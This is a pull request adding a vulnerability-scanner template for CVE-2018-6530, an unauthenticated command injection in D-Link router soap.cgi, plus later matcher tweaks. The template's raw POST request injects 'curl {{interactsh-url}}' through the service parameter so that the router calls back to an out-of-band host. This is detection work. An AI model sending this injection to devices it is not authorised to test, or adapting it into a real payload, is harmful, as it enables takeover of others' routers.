### PR TITLE
Create CVE-2018-6530

### DIFF
--- a/cves/2018/CVE-2018-6530.yaml
+++ b/cves/2018/CVE-2018-6530.yaml
@@ -1,0 +1,36 @@
+id: CVE-2018-6530
+
+info:
+  name: D-Link - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-6530
+    - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 9.8
+    cve-id: CVE-2018-6530
+    cwe-id: CWE-78
+  tags: cve,cve2018,d-link,rce,oast,unauth
+
+requests:
+  - raw:
+      - |
+        POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: identity
+        SOAPAction: "whatever-serviceType#whatever-action"
+        Content-Type: text/xml
+
+        whatever-content
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+# Enhanced by mp on 2022/04/26

--- a/http/cves/2018/CVE-2018-6530.yaml
+++ b/http/cves/2018/CVE-2018-6530.yaml
@@ -33,4 +33,8 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# Enhanced by mp on 2022/04/26
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"

--- a/http/cves/2018/CVE-2018-6530.yaml
+++ b/http/cves/2018/CVE-2018-6530.yaml
@@ -28,6 +28,7 @@ requests:
 
         whatever-content
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2018-6530

```
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
```

- References: https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO